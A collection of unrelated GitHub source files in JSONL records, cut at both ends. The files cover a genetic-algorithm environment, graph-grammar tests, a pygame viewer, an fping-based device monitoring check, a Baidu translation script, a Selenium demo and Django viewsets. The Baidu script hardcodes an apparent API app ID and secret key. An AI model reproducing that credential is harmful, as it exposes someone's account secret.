\"\"\"\n Calculate the fitness of an individual that is at a specific position.\n\n args:\n pos: a set of coordinates\n\n returns:\n The value of the bench on that position (float).\n \"\"\"\n self.evaluation_number += 1\n fitness = route_distance(route_df)\n self.evaluation_statistics.append(fitness)\n\n # Update curbest value\n if fitness < self.cur_best:\n self.cur_best = fitness\n self.cur_best_route = Route(route_df, self)\n\n self.evaluation_statistics_best.append(self.cur_best)\n self.generation_statistics.append(self.generation_number)\n return fitness\n\n def get_evaluation_statistics(self):\n return list(range(1, self.evaluation_number + 1)), self.evaluation_statistics\n\n def get_evaluation_statistics_best(self):\n return list(range(1, self.evaluation_number + 1)), self.evaluation_statistics_best\n\n def get_generation_statistics(self):\n return list(range(1, self.evaluation_number + 1)), self.generation_statistics\n","repo_name":"marleentheyoung/BScKI_Thesis_PPA","sub_path":"code_discrete_PPA/code/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5731353039","text":"import sys\ninput = sys.stdin.readline\n\nsize = int(input())\ntable = list(map(int, input().split()))\nanswer = [0 for _ in range(size)]\n\nstack = []\n\nfor idx in range(size):\n if not stack:\n answer[idx] = 0\n stack.append((idx+1, table[idx]))\n else:\n while stack:\n if stack[-1][1] < table[idx]:\n stack.pop()\n else:\n break\n \n if stack:\n answer[idx] = stack[-1][0]\n else:\n answer[idx] = 0\n stack.append((idx+1, table[idx]))\n\nfor ans in answer:\n print(ans, end=' ')","repo_name":"BangDori/python-algorithm","sub_path":"baekjoon/2493.py","file_name":"2493.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"45096285707","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\" Title \"\"\"\n\n__author__ = \"Hiroshi Kajino \"\n__copyright__ = \"(c) Copyright IBM Corp. 2018\"\n__version__ = \"0.1\"\n__date__ = \"Jan 1 2018\"\n\nfrom graph_grammar.io.smi import HGGen\nfrom graph_grammar.graph_grammar.hrg import extract_prod_rule, HyperedgeReplacementGrammar, IncrementalHyperedgeReplacementGrammar\nfrom graph_grammar.algo.tree_decomposition import tree_decomposition\nfrom networkx.algorithms.isomorphism import GraphMatcher\nimport os\nimport unittest\n\nclass HRGTest(unittest.TestCase):\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n '''\n def test_extract_prod_rule(self):\n base = os.path.dirname(os.path.abspath(__file__))\n hg_list = HGGen(os.path.join(base, \"test.smi\"))\n \n for each_hg in hg_list:\n clique_tree = tree_decomposition(each_hg)\n for each_node in clique_tree.nodes:\n parent = each_node\n myself = sorted(list(dict(clique_tree[parent]).keys()))[0]\n children = list(dict(clique_tree[myself]).keys())\n children.remove(parent)\n prod_rule = extract_prod_rule(\n clique_tree.node[parent][\"subhg\"], clique_tree.node[myself][\"subhg\"],\n [clique_tree.node[each_child][\"subhg\"] for each_child in children])\n self.assertTrue(check_prod_rule(prod_rule))\n '''\n def test_hrg(self):\n base = os.path.dirname(os.path.abspath(__file__))\n hg_list = HGGen(os.path.join(base, \"test.smi\"))\n #if not os.path.exists('hg'):\n # os.mkdir('hg')\n #for each_idx, each_hg in enumerate(hg_list):\n # each_hg.draw(os.path.join('hg', f'{each_idx}'))\n hrg = HyperedgeReplacementGrammar()\n prod_rule_seq_list = hrg.learn(hg_list)\n print(\"the number of prod rules is {}\".format(hrg.num_prod_rule))\n '''\n if not os.path.exists('prod_rules'):\n os.mkdir('prod_rules')\n if not os.path.exists('subhg'):\n os.mkdir('subhg')\n for each_idx, each_prod_rule in enumerate(hrg.prod_rule_corpus.prod_rule_list):\n self.assertTrue(check_prod_rule(each_prod_rule))\n each_prod_rule.draw(os.path.join('prod_rules', f'{each_idx}'))\n for each_idx, each_subhg in enumerate(hrg.clique_tree_corpus.subhg_list):\n each_subhg.draw(os.path.join('subhg', f'{each_idx}'), True)\n import gzip, pickle\n with gzip.open(os.path.join('prod_rules', 'hrg.pklz'), 'wb') as f:\n pickle.dump(hrg, f)\n '''\n\n def test_iso(self):\n base = os.path.dirname(os.path.abspath(__file__))\n hg_list = HGGen(os.path.join(base, \"test.smi\"))\n hg_list = list(hg_list)\n hrg = HyperedgeReplacementGrammar()\n prod_rule_seq_list = hrg.learn(hg_list)\n not_iso = 0\n for idx, each_prod_rule_seq in enumerate(prod_rule_seq_list):\n hg = hrg.construct(each_prod_rule_seq)\n self.assertEqual(len(hg.nodes), len(list(hg_list)[idx].nodes))\n self.assertEqual(len(hg.edges), len(list(hg_list)[idx].edges))\n gm = GraphMatcher(hg.hg, list(hg_list)[idx].hg)\n try:\n isomap = next(gm.isomorphisms_iter())\n except StopIteration:\n isomap = None\n if isomap is None:\n print(\"not isomorphic\")\n not_iso += 1\n self.assertEqual(not_iso, 0)\n print(\"not_iso = {}\".format(not_iso))\n\n def test_revert(self):\n base = os.path.dirname(os.path.abspath(__file__))\n hg_list = HGGen(os.path.join(base, \"test.smi\"))\n hrg = HyperedgeReplacementGrammar()\n prod_rule_seq_list = hrg.learn(hg_list)\n\n for each_hg_id in range(len(list(hg_list))):\n tmp = list(hg_list)[each_hg_id]\n each_prod_rule_id = -1\n # reverting may yield a different intermediate hypergraph, when it may matches a different subgraph.\n # but, the first step must be reverted.\n tmp, success = hrg.prod_rule_corpus.prod_rule_list[prod_rule_seq_list[each_hg_id][each_prod_rule_id]].revert(tmp)\n self.assertTrue(success, 'fails hg={}, prod_rule={}'.format(\n each_hg_id, prod_rule_seq_list[each_hg_id][each_prod_rule_id]))\n # this not necessarily works because the first revert can be applied to multiple portions.\n #each_prod_rule_id -= 1\n #tmp, success = hrg.prod_rule_corpus.prod_rule_list[prod_rule_seq_list[each_hg_id][each_prod_rule_id]].revert(tmp)\n #self.assertTrue(success, 'fails hg={}, prod_rule={}'.format(\n # each_hg_id, prod_rule_seq_list[each_hg_id][each_prod_rule_id]))\n'''\nclass IncrementalHRGTest(unittest.TestCase):\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def test_hrg(self):\n base = os.path.dirname(os.path.abspath(__file__))\n hg_list = HGGen(os.path.join(base, \"test.smi\"))\n hrg = IncrementalHyperedgeReplacementGrammar()\n prod_rule_seq_list = hrg.learn(hg_list)\n print(\"the number of prod rules is {}\".format(len(hrg.prod_rule_list)))\n for each_prod_rule in hrg.prod_rule_list:\n self.assertTrue(check_prod_rule(each_prod_rule))\n\n def test_iso(self):\n base = os.path.dirname(os.path.abspath(__file__))\n hg_list = HGGen(os.path.join(base, \"test.smi\"))\n hg_list = list(hg_list)\n hrg = IncrementalHyperedgeReplacementGrammar()\n prod_rule_seq_list = hrg.learn(hg_list)\n not_iso = 0\n for idx, each_prod_rule_seq in enumerate(prod_rule_seq_list):\n hg = hrg.construct(each_prod_rule_seq)\n self.assertEqual(len(hg.nodes), len(list(hg_list)[idx].nodes))\n self.assertEqual(len(hg.edges), len(list(hg_list)[idx].edges))\n gm = GraphMatcher(hg.hg, list(hg_list)[idx].hg)\n try:\n isomap = next(gm.isomorphisms_iter())\n except StopIteration:\n isomap = None\n if isomap is None:\n print(\"not isomorphic\")\n not_iso += 1\n self.assertEqual(not_iso, 0)\n print(\"not_iso = {}\".format(not_iso))\n''' \ndef check_prod_rule(prod_rule):\n ok_rule = True\n ext_node_list = []\n if not prod_rule.is_start_rule:\n for each_node in prod_rule.lhs.nodes:\n ext_node_list.append(each_node)\n if len(prod_rule.rhs.adj_edges(each_node)) != 1: ok_rule = False\n for each_node in prod_rule.rhs.nodes - set(ext_node_list):\n if len(prod_rule.rhs.adj_edges(each_node)) != 2: ok_rule = False\n for each_edge in prod_rule.rhs.edges:\n if \"nt_idx\" in prod_rule.rhs.edge_attr(each_edge) \\\n and prod_rule.rhs.edge_attr(each_edge)[\"terminal\"]:\n ok_rule = False\n return ok_rule\n \nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"ibm-research-tokyo/graph_grammar","sub_path":"src/tests/hrg_test.py","file_name":"hrg_test.py","file_ext":"py","file_size_in_byte":6976,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"52"} +{"seq_id":"11857838795","text":"import sys\nimport glob\nimport random\n\nimport pygame\nimport pygame.locals\nfrom PIL import Image, ImageFilter\n\nclass View() :\n\n def __init__(self):\n\n # Initialize PyGame\n pygame.init()\n\n self.screen = pygame.display.set_mode( (700,700), 0, 32)\n pygame.display.set_caption(\"ElectricDreamz\")\n\n # Set up FPS clock\n self.fps = 60\n self.fpsClock = pygame.time.Clock()\n\n self.speed = 0.1\n\n def loadImages(self):\n\n self.images_path = []\n self.images = []\n for path in glob.glob(\"./\"+word+\"/*.jpeg\"):\n self.images_path.append(path)\n self.images.append(pygame.image.load(path))\n\n self.coordinates = [ random.randint(0, 100) for i in self.images ]\n self.coordinates[random.randint(0,len(self.images)-1)] = 100\n self.renorm_coordinates()\n self.direction = random.randint(0,len(self.images)-1)\n\n self.font = pygame.font.Font(\"./Lack-Regular.otf\",50)\n self.text1 = self.makeText(\"What is\")\n self.text2 = self.makeText(\"'\"+word+\"' ?\")\n\n\n def change_direction(self):\n\n self.direction = random.randint(0,len(self.images)-1)\n\n def renorm_coordinates(self):\n\n s = sum(self.coordinates)\n self.coordinates = [ c/s for c in self.coordinates ]\n\n def makeText(self, text, insideColor = (250,250,250), outsideColor=(150,150,150)) :\n\n return self.font.render(text, 1, insideColor )\n textIn = self.font.render(text, 1, insideColor )\n #textOut = self.font.render(text, 1, outsideColor)\n #size = textIn.get_width() + 2, textIn.get_height() + 2\n #s = pygame.Surface(size, pygame.SRCALPHA, 32)\n #s.blit(textOut,(0,0))\n #s.blit(textOut,(2,2))\n #s.blit(textOut,(2,0))\n #s.blit(textOut,(0,2))\n #s.blit(textIn, (1,1))\n\n #return s\n\n def mainLoop(self) :\n\n # Handle events\n self.eventHandler()\n\n # Handle keys\n self.keysHandler()\n\n # Render elements\n self.update()\n self.render()\n\n # Update screen\n pygame.display.update()\n self.fpsClock.tick(self.fps)\n\n\n def eventHandler(self) :\n\n for event in pygame.event.get():\n\n if (event.type == pygame.QUIT) :\n pygame.quit()\n sys.exit()\n\n\n def keysHandler(self) :\n\n pass\n #keyPressed = pygame.key.get_pressed()\n #print(keyPressed)\n\n def blur(self,image, radius):\n\n # Convert the surface to PIL image\n surfSize = image.get_size()\n surfInString = pygame.image.tostring(image, \"RGBA\", False)\n surfPIL = Image.frombytes(\"RGBA\", surfSize, surfInString)\n\n # Blur image using PIL\n surfPILblurred = surfPIL.filter(ImageFilter.GaussianBlur(radius=radius))\n return pygame.image.fromstring(surfPILblurred.tobytes(\"raw\", \"RGBA\"), surfSize, \"RGBA\")\n\n\n def update(self):\n\n current_max = max(self.coordinates)\n current_max_coordinate = [i for i,j in enumerate(self.coordinates) if j == current_max][0]\n if current_max >= 0.99 and current_max_coordinate == self.direction:\n self.change_direction()\n elif current_max <= 0.80 and random.randint(0,100)<6:\n self.change_direction()\n\n self.speed = 0.9 * self.speed + 0.1 * max((1-current_max)/7.5,0.02)\n\n self.coordinates[self.direction] += self.speed\n self.renorm_coordinates()\n\n def render(self):\n\n self.screen.fill( (0,0,0) )\n\n coordinates_and_images = sorted(zip(self.coordinates, self.images), key=lambda ci:ci[0], reverse=True)\n\n i = 0\n for coordinate, image in coordinates_and_images:\n render_image = self.blur(image, (25*(1-coordinate))**1.5)\n render_image.set_alpha(int((1-coordinate)*255))\n if i == 0:\n self.screen.blit(render_image, (0,0))\n else:\n self.screen.blit(render_image, (0,0), special_flags=pygame.BLEND_RGBA_MIN)\n i+=1\n if i >= 5:\n break\n\n #size = textIn.get_width() + 2, textIn.get_height() + 2\n self.screen.blit(pygame.transform.scale(self.screen, (750*2,750*2)), (0,0))\n w1 = self.text1.get_width()\n h1 = self.text1.get_height()\n w2 = self.text2.get_width()\n h2 = self.text2.get_height()\n self.screen.blit(self.text1, (750/2-w1/2, 750/2-h1-10))\n self.screen.blit(self.text2, (750/2-w2/2, 750/2+10))\n\n\ndef main():\n\n v = View()\n v.loadImages()\n\n while True:\n v.mainLoop()\n\nword = sys.argv[1]\nmain()\n","repo_name":"hackstub/neuralWhat","sub_path":"play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":4605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29209898995","text":"import subprocess\r\n\r\nfrom django.core.exceptions import ValidationError\r\nfrom jsonschema import draft7_format_checker, validate\r\nfrom jsonschema.exceptions import ValidationError as SchemaError\r\nfrom swapper import load_model\r\n\r\nfrom openwisp_utils.utils import deep_merge_dicts\r\n\r\nfrom ... import settings as monitoring_settings\r\nfrom .. import settings as app_settings\r\nfrom ..exceptions import OperationalError\r\nfrom .base import BaseCheck\r\n\r\nChart = load_model('monitoring', 'Chart')\r\nMetric = load_model('monitoring', 'Metric')\r\nAlertSettings = load_model('monitoring', 'AlertSettings')\r\n\r\nDEFAULT_PING_CHECK_CONFIG = {\r\n 'count': {\r\n 'type': 'integer',\r\n 'default': 5,\r\n 'minimum': 2,\r\n # chosen to avoid slowing down the queue\r\n 'maximum': 20,\r\n },\r\n 'interval': {\r\n 'type': 'integer',\r\n 'default': 25,\r\n 'minimum': 10,\r\n # chosen to avoid slowing down the queue\r\n 'maximum': 1000,\r\n },\r\n 'bytes': {'type': 'integer', 'default': 56, 'minimum': 12, 'maximum': 65508},\r\n 'timeout': {\r\n 'type': 'integer',\r\n 'default': 800,\r\n 'minimum': 5,\r\n # arbitrary chosen to avoid slowing down the queue\r\n 'maximum': 1500,\r\n },\r\n}\r\n\r\n\r\ndef get_ping_schema():\r\n schema = {\r\n '$schema': 'http://json-schema.org/draft-07/schema#',\r\n 'type': 'object',\r\n 'additionalProperties': False,\r\n }\r\n schema['properties'] = deep_merge_dicts(\r\n DEFAULT_PING_CHECK_CONFIG, app_settings.PING_CHECK_CONFIG\r\n )\r\n return schema\r\n\r\n\r\nclass Ping(BaseCheck):\r\n schema = get_ping_schema()\r\n\r\n def validate_params(self):\r\n try:\r\n validate(self.params, self.schema, format_checker=draft7_format_checker)\r\n except SchemaError as e:\r\n message = 'Invalid param'\r\n path = '/'.join(e.path)\r\n if path:\r\n message = '{0} in \"{1}\"'.format(message, path)\r\n message = '{0}: {1}'.format(message, e.message)\r\n raise ValidationError({'params': message}) from e\r\n\r\n def check(self, store=True):\r\n count = self._get_param('count')\r\n interval = self._get_param('interval')\r\n bytes_ = self._get_param('bytes')\r\n timeout = self._get_param('timeout')\r\n ip = self._get_ip()\r\n # if the device has no available IP\r\n if not ip:\r\n monitoring = self.related_object.monitoring\r\n # device not known yet, ignore\r\n if monitoring.status == 'unknown':\r\n return\r\n # device is known, simulate down\r\n result = {'reachable': 0, 'loss': 100.0}\r\n if store:\r\n self.store_result(result)\r\n return result\r\n command = [\r\n 'fping',\r\n '-e', # show elapsed (round-trip) time of packets\r\n '-c %s' % count, # count of pings to send to each target,\r\n '-p %s' % interval, # interval between sending pings(in ms)\r\n '-b %s' % bytes_, # amount of ping data to send\r\n '-t %s' % timeout, # individual target initial timeout (in ms)\r\n '-q',\r\n ip,\r\n ]\r\n stdout, stderr = self._command(command)\r\n # fpings shows statistics on stderr\r\n output = stderr.decode('utf8')\r\n try:\r\n parts = output.split('=')\r\n if len(parts) > 2:\r\n min, avg, max = parts[-1].strip().split('/')\r\n i = -2\r\n else:\r\n i = -1\r\n sent, received, loss = parts[i].strip().split(',')[0].split('/')\r\n loss = float(loss.strip('%'))\r\n except (IndexError, ValueError) as e:\r\n message = 'Unrecognized fping output:\\n\\n{0}'.format(output)\r\n raise OperationalError(message) from e\r\n result = {'reachable': int(loss < 100), 'loss': loss}\r\n if result['reachable']:\r\n result.update(\r\n {'rtt_min': float(min), 'rtt_avg': float(avg), 'rtt_max': float(max)}\r\n )\r\n if store:\r\n self.store_result(result)\r\n return result\r\n\r\n def store_result(self, result):\r\n \"\"\"\r\n store result in the DB\r\n \"\"\"\r\n metric = self._get_metric()\r\n copied = result.copy()\r\n reachable = copied.pop('reachable')\r\n metric.write(reachable, extra_values=copied)\r\n\r\n def _get_param(self, param):\r\n \"\"\"\r\n Gets specified param or its default value according to the schema\r\n \"\"\"\r\n return self.params.get(param, self.schema['properties'][param]['default'])\r\n\r\n def _get_ip(self):\r\n \"\"\"\r\n Figures out ip to use or fails raising OperationalError\r\n \"\"\"\r\n device = self.related_object\r\n ip = device.management_ip\r\n if not ip and not app_settings.MANAGEMENT_IP_ONLY:\r\n ip = device.last_ip\r\n return ip\r\n\r\n def _command(self, command):\r\n \"\"\"\r\n Executes command (easier to mock)\r\n \"\"\"\r\n p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n return p.stdout, p.stderr\r\n\r\n def _get_metric(self):\r\n \"\"\"\r\n Gets or creates metric\r\n \"\"\"\r\n metric, created = self._get_or_create_metric()\r\n if created:\r\n self._create_alert_settings(metric)\r\n self._create_charts(metric)\r\n return metric\r\n\r\n def _create_alert_settings(self, metric):\r\n alert_settings = AlertSettings(metric=metric)\r\n alert_settings.full_clean()\r\n alert_settings.save()\r\n\r\n def _create_charts(self, metric):\r\n \"\"\"\r\n Creates device charts if necessary\r\n \"\"\"\r\n charts = ['uptime', 'packet_loss', 'rtt']\r\n for chart in charts:\r\n if chart not in monitoring_settings.AUTO_CHARTS:\r\n continue\r\n chart = Chart(metric=metric, configuration=chart)\r\n chart.full_clean()\r\n chart.save()\r\n","repo_name":"openwisp/openwisp-monitoring","sub_path":"openwisp_monitoring/check/classes/ping.py","file_name":"ping.py","file_ext":"py","file_size_in_byte":6013,"program_lang":"python","lang":"en","doc_type":"code","stars":131,"dataset":"github-code","pt":"52"} +{"seq_id":"39872510235","text":"# /usr/bin/env python\n# coding=utf-8\n\n# import httplib\n# import md5\nimport urllib\nimport io\nimport random\nimport urllib.request\nimport hashlib\nfrom hashlib import md5\nimport json\n\nimport sys\n# sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='gb2312') #改变标准输出的默认编码\n# print(sys.getdefaultencoding())\n# print('\\u8266')\n\ndef md52(str):\n m = hashlib.md5()\n m.update(str.encode(\"utf8\"))\n # print(m.hexdigest())\n return m.hexdigest()\n\n\ndef md5GBK(str1):\n m = hashlib.md5(str1.encode(encoding='utf-8'))\n return m.hexdigest()\n # return m.hexdigest()\n\n\nprint(md52('hello'))\nprint(md5GBK('你好'))\n\nappid = '20180412000145467'\nsecretKey = 'F2ekgIAXYQvZlbWNH0Iu'\n\n# httpClient = None\nmyurl = '/api/trans/vip/translate'\nq = '国民的アイドルいきなり即ハメドッキリ4本番いつでも即合体、どこでも即絶頂三上悠亜'\n# q = \"你好\"\n# print(q)\n# q = b\"\\u756a\\u3044\\u3064\\u3067\\u3082\\u5373\\u5408\\u4f53\\u3001\\u3069\\u3053\\u3067\\u3082\\u5373\\u7d76\\u9802\\u4e09\\u4e0a\\u60a0\\u4e9c\"\n# print(q.encode(\"ascii\"))\n# q = 'hello'\nfromLang = 'jp'\ntoLang = 'zh'\nsalt = random.randint(32768, 65536)\n\nstr(salt)\nprint(1)\nsign = appid + q + str(salt) + secretKey\nprint(2)\n# m1 = md5.new()\n# m1.update(sign)\n# sign = m1.hexdigest()\n\n# md5_obj = md5()\n# md5_obj.update(sign.encode('utf-8', 'ignore'))\n# md5_obj.update(sign.encode(encoding='gb2312'))\nsign = md5GBK(sign)\n\nquery = {\n 'appid': appid,\n 'q': q,\n 'from': fromLang,\n 'to': toLang,\n 'salt': str(salt),\n 'sign': sign\n}\n\nquery_str = urllib.parse.urlencode(query)\nprint(query_str)\n\n# myurl = myurl + '?appid=' + appid + '&q=' + q + '&from=' + fromLang + '&to=' + toLang + '&salt=' + str(\n# salt) + '&sign=' + sign\n\nmyurl += \"?\" + query_str\n\nprint(3)\ntry:\n url = 'http://api.fanyi.baidu.com' + myurl\n print(url)\n req = urllib.request.Request(url=url)\n print(3.1)\n res = urllib.request.urlopen(req)\n print(3.15)\n data = res.read()\n print(3.2)\n obj = json.loads(data, encoding=\"utf-8\")\n print(4)\n print(obj)\n print(obj[\"trans_result\"][0][\"dst\"])\n\n # httpClient = httplib.HTTPConnection('api.fanyi.baidu.com')\n # httpClient.request('GET', myurl)\n #\n # # response是HTTPResponse对象\n # response = httpClient.getresponse()\n # print(response.read())\nexcept Exception as e:\n print(e)\n","repo_name":"pythonlittleboy/python_gentleman_crawler","sub_path":"test/baidu.py","file_name":"baidu.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"15322251965","text":"from functools import reduce\nfrom typing import Optional\n\nfrom flask import current_app, Flask\nfrom sqlalchemy import func\nfrom sqlalchemy.dialects.postgresql import insert\n\nfrom config import aggregation # type: ignore[attr-defined]\nfrom config import aggregation_rules # type: ignore[attr-defined]\nfrom config import calculated_indicators # type: ignore[attr-defined]\nfrom config import indicators # type: ignore[attr-defined]\nfrom config.general import DEPLOYMENT_NAME\nfrom data.query.mock import (\n generate_query_mock_data,\n build_dimension_values,\n)\nfrom log import LOG\nfrom models.alchemy.query import (\n DimensionValue,\n DruidDatasource,\n)\nfrom models.alchemy.mixin import utcnow\n\nfrom web.server.app_druid import initialize_druid_context\nfrom web.server.data.data_access import Transaction\nfrom web.server.data.druid_context import PopulatingDruidApplicationContext\n\n\ndef update_db_datasource(\n datasource_config: Optional[str] = 'LATEST_DATASOURCE',\n skip_grouped_sketch_sizes: bool = False,\n) -> None:\n '''Makes a new datasource available to be used in a web server context.\n To do that it adds it to its database as well as all meta data about it.\n '''\n app = current_app\n initialize_druid_context(app, datasource_config='LATEST_DATASOURCE')\n valid_datasources = app.druid_context.druid_metadata.get_datasources_for_site(\n DEPLOYMENT_NAME\n )\n if datasource_config is not None:\n _populate_datasource(app, datasource_config, skip_grouped_sketch_sizes)\n else:\n LOG.info('Populating datasources %s', valid_datasources)\n for datasource in valid_datasources:\n LOG.info('Processing datasource %s', datasource)\n _populate_datasource(app, datasource, skip_grouped_sketch_sizes)\n\n LOG.info(\n 'Beginning cleaning up of vanished datasources... Valid datasets are %s',\n valid_datasources,\n )\n\n with Transaction() as transaction:\n session = transaction.run_raw()\n deleted_datasource_ids = [\n ds_id\n for ds_id, in session.execute(\n # pylint: disable=no-member\n DruidDatasource.__table__.delete()\n .where(DruidDatasource.datasource.notin_(valid_datasources))\n .returning(DruidDatasource.id)\n )\n ]\n\n # First, remove the deleted datasources from all the rows that were referencing it\n session.query(DimensionValue).filter(\n DimensionValue.datasources.op('&&')(deleted_datasource_ids)\n ).update(\n {\n 'datasources': reduce(\n func.array_remove,\n deleted_datasource_ids,\n DimensionValue.datasources,\n )\n },\n synchronize_session=False,\n )\n\n # Then remove the rows that were orpaned by the previous one, i.e. now have no any\n # associated datasources\n session.query(DimensionValue).filter(DimensionValue.datasources == []).delete(\n synchronize_session=False\n )\n\n\ndef _populate_datasource(\n app: Flask, datasource_config: str, skip_grouped_sketch_sizes: bool\n) -> None:\n initialize_druid_context(\n app,\n datasource_config=datasource_config,\n cls=PopulatingDruidApplicationContext,\n skip_grouped_sketch_sizes=skip_grouped_sketch_sizes,\n )\n\n LOG.info('Generating Query mock data')\n druid_context = app.druid_context\n dimension_values = druid_context.dimension_values_lookup\n query_data = generate_query_mock_data(\n indicators.DATA_SOURCES,\n aggregation.DIMENSION_CATEGORIES,\n aggregation.CALENDAR_SETTINGS,\n aggregation_rules.CALCULATIONS_FOR_FIELD,\n calculated_indicators.CALCULATED_INDICATOR_CONSTITUENTS,\n druid_context.dimension_metadata.field_metadata,\n )\n LOG.info('Finished generating Query mock data')\n\n LOG.info('Beginning data population...')\n with Transaction() as transaction:\n datasource_values = {\n 'datasource': druid_context.current_datasource.name,\n 'min_date': druid_context.data_time_boundary.get_min_data_date(),\n 'max_date': druid_context.data_time_boundary.get_max_data_date(),\n 'meta_data': {\n 'sketch_sizes': druid_context.dimension_metadata.sketch_sizes,\n 'grouped_dimension_sketch_sizes': (\n druid_context.dimension_metadata.grouped_dimension_sketch_sizes\n ),\n },\n 'last_modified': utcnow(),\n }\n (current_datasource_id,) = next(\n transaction.run_raw().execute(\n insert(DruidDatasource)\n .values(datasource_values)\n .on_conflict_do_update(\n index_elements=['datasource'],\n set_=datasource_values,\n )\n .returning(DruidDatasource.id)\n )\n )\n build_dimension_values(\n transaction.run_raw(),\n current_datasource_id,\n query_data.dimensions,\n dimension_values.dimension_map,\n aggregation.DIMENSION_PARENTS,\n )\n","repo_name":"Zenysis/Harmony","sub_path":"db/druid/update_db_datasource.py","file_name":"update_db_datasource.py","file_ext":"py","file_size_in_byte":5212,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"52"} +{"seq_id":"33192260983","text":"\"\"\"\n鼠标相关的操作方法都封装在ActionChains类里面\nperform() 执行ActionChains类中存储的所有行为\ncontext_click() 右击\ndouble_click() 双击\ndrag_and_drop() 拖动\nmove_to_element() 鼠标悬停\n\"\"\"\nfrom selenium.webdriver import ActionChains\nfrom selenium import webdriver\n\ndriver = webdriver.Chrome()\ndriver.get(\"https://www.baidu.com/?tn=78000241_hao_pg\")\n\nelement = driver.find_element_by_css_selector(\"#s-usersetting-top\")\n# 对元素执行悬停操作\nActionChains(driver).move_to_element(element).perform()\nelement1 = driver.find_element_by_xpath(\"//span[@id='s-usersetting-top']\")\n# 对元素进行双击操作\nActionChains(driver).double_click(element1).perform()","repo_name":"UULIN/automation_test","sub_path":"unit4_WebDriver_API/4.4鼠标操作.py","file_name":"4.4鼠标操作.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11907945253","text":"from constance.backends.database.models import Constance\nfrom django.conf import settings\nfrom django_celery_results.models import TaskResult\nfrom django_filters import rest_framework as filters\nfrom django.db import transaction\nfrom django_celery_beat.models import PeriodicTask, IntervalSchedule\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom rest_framework import status\nfrom rest_framework.decorators import action\nfrom rest_framework.filters import SearchFilter\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.viewsets import ModelViewSet\n\nfrom apps.system.serializers import ConstanceSerializer, IntervalScheduleSerializer, PeriodicTaskDefaultSerializer, \\\n TaskResultDefaultSerializer\nfrom rc871_backend.utils.functions import get_settings\n\n\nclass ConfigurationFilter(filters.FilterSet):\n class Meta:\n model = Constance\n fields = ['key']\n\n\nclass ConfigurationViewSet(ModelViewSet):\n queryset = Constance.objects.all()\n serializer_class = ConstanceSerializer\n filter_backends = [DjangoFilterBackend]\n filterset_class = ConfigurationFilter\n paginator = None\n\n def update(self, request, *args, **kwargs):\n instance = self.get_object()\n value = request.data.get('value', None)\n instance.value = value\n instance.save()\n return Response(ConstanceSerializer(instance).data, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['PUT', ])\n @transaction.atomic()\n def update_multiple(self, request):\n for item in request.data:\n instance = Constance.objects.get(key=item.get('key'))\n instance.value = item.get('value', None)\n instance.save(update_fields=['value'])\n return Response(request.data, status=status.HTTP_200_OK)\n\n def list(self, request, *args, **kwargs):\n \"\"\"\n get all setting item\n \"\"\"\n allow_settings = [key for key, options in getattr(\n settings, 'CONSTANCE_CONFIG', {}).items()]\n items = get_settings(allow_settings)\n return Response(items, status=status.HTTP_200_OK)\n\n @action(methods=['GET', ], detail=False)\n def retrieve_for_key(self, request):\n key = self.request.query_params.get('key', None)\n if key:\n instance = Constance.objects.get(key=key)\n data = {\n 'id': str(instance.id),\n 'key': instance.key,\n 'value': instance.value\n }\n return Response(data)\n else:\n return Response({\"error\": \"el key es obligatorio\"}, status=status.HTTP_404_NOT_FOUND)\n\n\nclass ConfigurationGlobalViewSet(APIView):\n permission_classes = (AllowAny,)\n authentication_classes = []\n\n def get(self, request, format=None):\n key = self.request.query_params.get('key', None)\n if key:\n instance = Constance.objects.get(key=key)\n data = {\n 'id': str(instance.id),\n 'key': instance.key,\n 'value': instance.value\n }\n return Response(data)\n else:\n return Response({\"error\": \"el key es obligatorio\"}, status=status.HTTP_404_NOT_FOUND)\n\n\nclass IntervalScheduleViewSet(ModelViewSet):\n queryset = IntervalSchedule.objects.all()\n serializer_class = IntervalScheduleSerializer\n\n @action(methods=['GET'], detail=False)\n def field_options(self, request):\n field = self.request.query_params.get('field', None)\n fields = self.request.query_params.getlist('fields', None)\n if fields:\n try:\n data = {}\n for field in fields:\n data[field] = []\n for c in IntervalSchedule._meta.get_field(field).choices:\n data[field].append({\n \"value\": c[0],\n \"description\": c[1]\n })\n return Response(data, status=status.HTTP_200_OK)\n except ValueError as e:\n return Response(e, status=status.HTTP_400_BAD_REQUEST)\n elif field:\n try:\n choices = []\n for c in IntervalSchedule._meta.get_field(field).choices:\n choices.append({\n \"value\": c[0],\n \"description\": c[1]\n })\n return Response(choices, status=status.HTTP_200_OK)\n except ValueError as e:\n return Response(e, status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response({\"error\": \"the field parameter is mandatory\"}, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass InfoAPIView(APIView):\n permission_classes = (AllowAny,)\n authentication_classes = []\n\n def get(self, request, format=None):\n return Response({\n 'version': settings.SITE_VERSION,\n 'logo': settings.SITE_LOGO,\n 'name': settings.SITE_NAME\n }, status=status.HTTP_200_OK)\n\n\nclass PeriodicTaskViewSet(ModelViewSet):\n queryset = PeriodicTask.objects.all()\n serializer_class = 